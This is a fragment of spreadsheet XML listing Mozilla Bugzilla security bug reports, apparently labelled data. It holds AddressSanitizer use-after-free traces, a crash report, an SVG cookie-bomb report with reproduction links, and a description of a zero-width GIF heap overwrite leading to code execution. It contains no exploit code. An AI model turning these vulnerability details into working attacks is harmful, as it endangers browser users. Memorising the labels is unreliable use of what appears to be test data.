      <c r="X3672" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3673">
      <c r="A3673" t="n">
        <v>1620818</v>
      </c>
      <c r="B3673" t="inlineStr">
        <is>
          <t>2020-03-08 00:58:38 -0800</t>
        </is>
      </c>
      <c r="C3673" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:3302:12 in SynchronizeLayoutHistoryState</t>
        </is>
      </c>
      <c r="D3673" t="inlineStr">
        <is>
          <t>2024-05-30 10:12:24 -0700</t>
        </is>
      </c>
      <c r="E3673" t="n">
        <v>1</v>
      </c>
      <c r="F3673" t="n">
        <v>1</v>
      </c>
      <c r="G3673" t="n">
        <v>3</v>
      </c>
      <c r="H3673" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3673" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3673" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K3673" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3673" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3673" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3673" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3673" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3673" t="inlineStr"/>
      <c r="Q3673" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3673" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3673" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T3673" t="n">
        <v>1</v>
      </c>
      <c r="U3673" t="n">
        <v>0</v>
      </c>
      <c r="V3673" t="n">
        <v>23</v>
      </c>
      <c r="W3673" t="inlineStr">
        <is>
          <t>Created attachment 9131731
browser-ff.txt
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36
Steps to reproduce:
I have been randomly obtaining this Use-After-Free at a specific website that I was investigating. I don't have a reproducer so far. Not sure if it's due to recent Firefox code changes or has really been triggered intentionally since it was with a custom Firefox build and m-c-20200226162551-fuzzing-asan-opt.
Actual results:
```
=================================================================
==27386==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0001009c0 at pc 0x7f098a30d54a bp 0x7ffe5a8f3a60 sp 0x7ffe5a8f3a58
READ of size 8 at 0x60e0001009c0 thread T0 (Web Content)
    #0 0x7f098a30d549 in SynchronizeLayoutHistoryState /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:3302:12
    #1 0x7f098a30d549 in non-virtual thunk to nsDocShell::SynchronizeLayoutHistoryState() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #2 0x7f09877e53f2 in nsDocumentViewer::Close(nsISHEntry*) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1656:44
    #3 0x7f09877e487d in nsDocumentViewer::~nsDocumentViewer() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:627:5
    #4 0x7f09877e6ccd in nsDocumentViewer::~nsDocumentViewer() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:625:39
    #5 0x7f09877e4486 in nsDocumentViewer::Release() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:613:1
    #6 0x7f098a2e7cc7 in ~nsCOMPtr_base /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:330:7
    #7 0x7f098a2e7cc7 in nsDocShell::~nsDocShell() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:450:1
    #8 0x7f098a2e937d in nsDocShell::~nsDocShell() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:411:27
    #9 0x7f097edb2c88 in SnowWhiteKiller::Visit(nsPurpleBuffer&amp;, nsPurpleBufferEntry*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2460:9
    #10 0x7f097ed91876 in void nsPurpleBuffer::VisitEntries&lt;SnowWhiteKiller&gt;(SnowWhiteKiller&amp;) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:942:23
    #11 0x7f097ed92135 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&amp;) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2625:14
    #12 0x7f09813d97dc in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:147:9
    #13 0x7f097ef6cea8 in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:326:22
    #14 0x7f097ef48bd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1220:14
    #15 0x7f097ef53a3c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:481:10
    #16 0x7f09801a9fcf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:87:21
    #17 0x7f098009d1f7 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #18 0x7f098009d1f7 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308:3
    #19 0x7f098009d1f7 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290:3
    #20 0x7f0987230cb8 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #21 0x7f098ad63ca6 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:944:20
    #22 0x7f098009d1f7 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #23 0x7f098009d1f7 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308:3
    #24 0x7f098009d1f7 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290:3
    #25 0x7f098ad63269 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:779:34
    #26 0x55fdb83a2433 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #27 0x55fdb83a2433 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:303:18
    #28 0x7f099ad2c1e2 in __libc_start_main /build/glibc-4WA41p/glibc-2.30/csu/../csu/libc-start.c:308:16
    #29 0x55fdb82f7ddc in _start (/home/fuzzer/dev/m-c-20200226162551-fuzzing-asan-opt/firefox+0x9bddc)
0x60e0001009c0 is located 0 bytes inside of 160-byte region [0x60e0001009c0,0x60e000100a60)
freed by thread T0 (Web Content) here:
    #0 0x55fdb836faad in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
    #1 0x7f098a3be096 in nsSHEntry::Release() /builds/worker/workspace/build/src/docshell/shistory/nsSHEntry.cpp:81:1
    #2 0x7f098a2e79a4 in ~nsCOMPtr_base /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:330:7
    #3 0x7f098a2e79a4 in nsDocShell::~nsDocShell() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:450:1
    #4 0x7f098a2e937d in nsDocShell::~nsDocShell() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:411:27
    #5 0x7f097edb2c88 in SnowWhiteKiller::Visit(nsPurpleBuffer&amp;, nsPurpleBufferEntry*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2460:9
    #6 0x7f097ed91876 in void nsPurpleBuffer::VisitEntries&lt;SnowWhiteKiller&gt;(SnowWhiteKiller&amp;) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:942:23
    #7 0x7f097ed92135 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&amp;) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2625:14
    #8 0x7f09813d97dc in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:147:9
    #9 0x7f097ef6cea8 in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:326:22
    #10 0x7f097ef48bd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1220:14
    #11 0x7f097ef53a3c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:481:10
    #12 0x7f09801a9fcf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:87:21
    #13 0x7f098009d1f7 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #14 0x7f098009d1f7 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308:3
    #15 0x7f098009d1f7 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290:3
    #16 0x7f0987230cb8 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #17 0x7f098ad63ca6 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:944:20
    #18 0x7f098009d1f7 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #19 0x7f098009d1f7 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308:3
    #20 0x7f098009d1f7 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290:3
    #21 0x7f098ad63269 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:779:34
    #22 0x55fdb83a2433 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #23 0x55fdb83a2433 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:303:18
    #24 0x7f099ad2c1e2 in __libc_start_main /build/glibc-4WA41p/glibc-2.30/csu/../csu/libc-start.c:308:16
previously allocated by thread T0 (Web Content) here:
    #0 0x55fdb836fd2d in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:145:3
    #1 0x55fdb83a582d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f098a3ae651 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f098a3ae651 in mozilla::dom::CreateSHEntryForDocShell(nsISHistory*) /builds/worker/workspace/build/src/docshell/shistory/ChildSHistory.cpp:126:32
    #4 0x7f098a3525d4 in nsDocShell::AddToSessionHistory(nsIURI*, nsIChannel*, nsIPrincipal*, nsIPrincipal*, nsIPrincipal*, nsIContentSecurityPolicy*, bool, nsISHEntry**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:11073:13
    #5 0x7f098a33efc3 in nsDocShell::OnNewURI(nsIURI*, nsIChannel*, nsIPrincipal*, nsIPrincipal*, nsIPrincipal*, unsigned int, nsIContentSecurityPolicy*, bool, bool, bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:10540:13
    #6 0x7f098a33fbac in nsDocShell::OnLoadingSite(nsIChannel*, bool, bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:10602:10
    #7 0x7f098a2d9a8a in nsDocShell::CreateContentViewer(nsTSubstring&lt;char&gt; const&amp;, nsIRequest*, nsIStreamListener**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7705:33
    #8 0x7f098a2d7c9c in nsDSURIContentListener::DoContent(nsTSubstring&lt;char&gt; const&amp;, bool, nsIRequest*, nsIStreamListener**, bool*) /builds/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:168:20
    #9 0x7f098195227a in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:632:18
    #10 0x7f098194f84a in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:313:9
    #11 0x7f098194e211 in nsDocumentOpenInfo::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:191:8
    #12 0x7f097faa807c in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:707:20
    #13 0x7f097fab671c in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&amp;, mozilla::net::nsHttpResponseHead const&amp;, bool const&amp;, mozilla::net::nsHttpHeaderArray const&amp;, mozilla::net::ParentLoadInfoForwarderArgs const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, unsigned long const&amp;, int const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, nsTString&lt;char&gt; const&amp;, mozilla::net::NetAddr const&amp;, mozilla::net::NetAddr const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, long const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, mozilla::net::ResourceTimingStructArgs const&amp;, bool const&amp;, mozilla::Maybe&lt;unsigned int&gt; const&amp;, bool const&amp;, nsILoadInfo::CrossOriginOpenerPolicy const&amp;) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:557:3
    #14 0x7f097fb6d806 in operator() /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:411:15
    #15 0x7f097fb6d806 in std::_Function_handler&lt;void (), mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&amp;, mozilla::net::nsHttpResponseHead const&amp;, bool const&amp;, mozilla::net::nsHttpHeaderArray const&amp;, mozilla::net::ParentLoadInfoForwarderArgs const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, unsigned long const&amp;, int const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, nsTString&lt;char&gt; const&amp;, mozilla::net::NetAddr const&amp;, mozilla::net::NetAddr const&amp;, short const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, long const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, mozilla::net::ResourceTimingStructArgs const&amp;, bool const&amp;, mozilla::Maybe&lt;unsigned int&gt; const&amp;, bool const&amp;, nsILoadInfo::CrossOriginOpenerPolicy const&amp;)::$_5&gt;::_M_invoke(std::_Any_data const&amp;) /builds/worker/fetches/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/7.4.0/../../../../include/c++/7.4.0/bits/std_function.h:316:2
    #16 0x7f097f8e83ba in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:260:10
    #17 0x7f097fab47ff in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&amp;, mozilla::net::nsHttpResponseHead const&amp;, bool const&amp;, mozilla::net::nsHttpHeaderArray const&amp;, mozilla::net::ParentLoadInfoForwarderArgs const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, unsigned long const&amp;, int const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, nsTString&lt;char&gt; const&amp;, mozilla::net::NetAddr const&amp;, mozilla::net::NetAddr const&amp;, short const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, long const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, mozilla::net::ResourceTimingStructArgs const&amp;, bool const&amp;, mozilla::Maybe&lt;unsigned int&gt; const&amp;, bool const&amp;, nsILoadInfo::CrossOriginOpenerPolicy const&amp;) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:401:12
    #18 0x7f098086677c in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:862:28
    #19 0x7f098057a777 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:8563:32
    #20 0x7f098019e122 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2214:25
    #21 0x7f098019932a in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2136:9
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:3302:12 in SynchronizeLayoutHistoryState
Shadow bytes around the buggy address:
  0x0c1c800180e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c800180f0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1c80018100: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c80018110: fd fd fd fd fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c1c80018120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 fa
=&gt;0x0c1c80018130: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd
  0x0c1c80018140: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c1c80018150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1c80018160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1c80018170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1c8001818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27386==ABORTING
```</t>
        </is>
      </c>
      <c r="X3673" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3674">
      <c r="A3674" t="n">
        <v>490196</v>
      </c>
      <c r="B3674" t="inlineStr">
        <is>
          <t>2009-04-25 23:49:25 -0700</t>
        </is>
      </c>
      <c r="C3674" t="inlineStr">
        <is>
          <t>Firefox crashes when click the spinarrow button to increment and then decrement [@ nsButtonBoxFrame::DoMouseClick]</t>
        </is>
      </c>
      <c r="D3674" t="inlineStr">
        <is>
          <t>2018-04-30 13:12:22 -0700</t>
        </is>
      </c>
      <c r="E3674" t="n">
        <v>1</v>
      </c>
      <c r="F3674" t="n">
        <v>1</v>
      </c>
      <c r="G3674" t="n">
        <v>3</v>
      </c>
      <c r="H3674" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3674" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3674" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K3674" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L3674" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3674" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3674" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3674" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3674" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3674" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3674" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3674" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T3674" t="n">
        <v>1</v>
      </c>
      <c r="U3674" t="n">
        <v>1</v>
      </c>
      <c r="V3674" t="n">
        <v>27</v>
      </c>
      <c r="W3674" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
Firefox crashes when remember visited pages is set to 0
Reproducible: Always
Steps to Reproduce:
1. Go to Tool-&gt;Option-&gt;Privacy setting page.
2. In the history area "Remember visited pages for the last xxx days",
click the up-arrow button to increment the value, and decrement it.
When the value decreased to "0", Firefox crashes.
I have sent 2 crash reports.
http://crash-stats.mozilla.com/report/index/be096666-7fee-49d6-aa67-0038f2090425
http://crash-stats.mozilla.com/report/index/57c34c31-3365-4c85-87bb-35dfe2090425</t>
        </is>
      </c>
      <c r="X3674" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3675">
      <c r="A3675" t="n">
        <v>1325923</v>
      </c>
      <c r="B3675" t="inlineStr">
        <is>
          <t>2016-12-27 01:14:07 -0800</t>
        </is>
      </c>
      <c r="C3675" t="inlineStr">
        <is>
          <t>SVG image can be used to set cookie</t>
        </is>
      </c>
      <c r="D3675" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:27 -0700</t>
        </is>
      </c>
      <c r="E3675" t="n">
        <v>1</v>
      </c>
      <c r="F3675" t="n">
        <v>1</v>
      </c>
      <c r="G3675" t="n">
        <v>3</v>
      </c>
      <c r="H3675" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3675" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3675" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K3675" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3675" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3675" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3675" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3675" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3675" t="inlineStr">
        <is>
          <t>[adv-main57+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3675" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3675" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3675" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T3675" t="n">
        <v>1</v>
      </c>
      <c r="U3675" t="n">
        <v>0</v>
      </c>
      <c r="V3675" t="n">
        <v>66</v>
      </c>
      <c r="W3675" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Steps to reproduce:
1. Go to https://jsfiddle.net/26nLj6mL/1/
2. Now go to https://shhnjk.com/
Actual results:
https://shhnjk.com/ is not accessible and says "Bad request" due to Cookie bomb. Same attack can be done from https://vuln.shhnjk.com/svg_data.html.
Expected results:
Cookie should not be set by SVG image. Fix of https://insert-script.blogspot.ae/2016/12/firefox-svg-cross-domain-cookie.html only prevented setting cross domain cookie. But if site hosted svg image who has content disposition: attachment specified would be affected too. Same for the site who allows data URI in img tag.</t>
        </is>
      </c>
      <c r="X3675" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3676">
      <c r="A3676" t="n">
        <v>157989</v>
      </c>
      <c r="B3676" t="inlineStr">
        <is>
          <t>2002-07-17 14:30:37 -0700</t>
        </is>
      </c>
      <c r="C3676" t="inlineStr">
        <is>
          <t>Possible heap corruption with 0-width GIF</t>
        </is>
      </c>
      <c r="D3676" t="inlineStr">
        <is>
          <t>2002-09-05 16:29:48 -0700</t>
        </is>
      </c>
      <c r="E3676" t="n">
        <v>1</v>
      </c>
      <c r="F3676" t="n">
        <v>1</v>
      </c>
      <c r="G3676" t="n">
        <v>3</v>
      </c>
      <c r="H3676" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3676" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3676" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3676" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3676" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3676" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3676" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3676" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3676" t="inlineStr">
        <is>
          <t>[adt1 RTM] [ETA 07/24]</t>
        </is>
      </c>
      <c r="Q3676" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3676" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3676" t="inlineStr">
        <is>
          <t>mozilla1.0.1</t>
        </is>
      </c>
      <c r="T3676" t="n">
        <v>1</v>
      </c>
      <c r="U3676" t="n">
        <v>0</v>
      </c>
      <c r="V3676" t="n">
        <v>17</v>
      </c>
      <c r="W3676" t="inlineStr">
        <is>
          <t>Submitter name:                zen-parse
   Submitter email address:       zen-parse@gmx.net
   Acknowledgement checkbox:      on
   Product:                       Netscape 6.x
   Operating system:              Unix: x86 Linux
   OS version:                    redhat 7.0
   Issue summary:                 a "0 width" GIF image: exploitable heap overwrite.
Issue details:
A specially formed gif image with width 0 can be 
used to overwrite 'chunk' information and other 
heap based information.
By overwriting a function pointer with an 
address containing user supplied data, it is 
possible to execute arbitary code.
http://lxr.mozilla.org/mozilla/source/modules/libimg/gifcom/gif.cpp#1274
down to line 1310
and then line 1351 and 1354
This form was submitted from
http://help.netscape.com/forms/bug-security.html?cp=bbpctr
with Opera/6.0 (Linux 2.2.19-7.0.16 i686; U)  [en].</t>
        </is>
      </c>
      <c r="X3676" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3677">
      <c r="A3677" t="n">
        <v>1266963</v>
      </c>
      <c r="B3677" t="inlineStr">
        <is>
          <t>2016-04-23 07:14:35 -0700</t>
        </is>
      </c>
      <c r="C3677" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsXULPopupManager::KeyDown</t>
        </is>
      </c>
      <c r="D3677" t="inlineStr">
        <is>
          <t>2024-05-30 09:16:34 -0700</t>
        </is>
      </c>
      <c r="E3677" t="n">
        <v>1</v>
      </c>
      <c r="F3677" t="n">
        <v>1</v>
      </c>
      <c r="G3677" t="n">
        <v>3</v>
      </c>
      <c r="H3677" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3677" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3677" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K3677" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3677" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3677" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3677" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3677" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3677" t="inlineStr">
        <is>
          <t>[adv-main48+] btpp-active</t>
        </is>
      </c>
      <c r="Q3677" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3677" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3677" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T3677" t="n">
        <v>1</v>
      </c>
      <c r="U3677" t="n">
        <v>0</v>
      </c>
      <c r="V3677" t="n">
        <v>17</v>
      </c>
      <c r="W3677" t="inlineStr">
        <is>
          <t>I don't have a testcase for this, but this stack keeps coming every now and then. looks to be some combination of testcase and keyboard/mouse gestures. Bug seems pretty clear, in nsXULPopupManager::HidePopupCallback, we call "1131   delete item;" which deletes the item (GetTopVisibleMenu()) but does not null it out or store it as strong pointer. Later this deleted pointer is accessed in nsXULPopupManager::KeyDown.
==29531==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b000b353b0 at pc 0x7fb96b53c66b bp 0x7ffe58230850 sp 0x7ffe58230848
READ of size 4 at 0x60b000b353b0 thread T0
    #0 0x7fb96b53c66a in IgnoreKeys layout/xul/nsXULPopupManager.h:167:38
    #1 0x7fb96b53c66a in nsXULPopupManager::KeyDown(nsIDOMKeyEvent*) layout/xul/nsXULPopupManager.cpp:2608
    #2 0x7fb96b53b8f5 in nsXULPopupManager::HandleEvent(nsIDOMEvent*) layout/xul/nsXULPopupManager.cpp:2521:12
    #3 0x7fb968d8fa69 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:1099:16
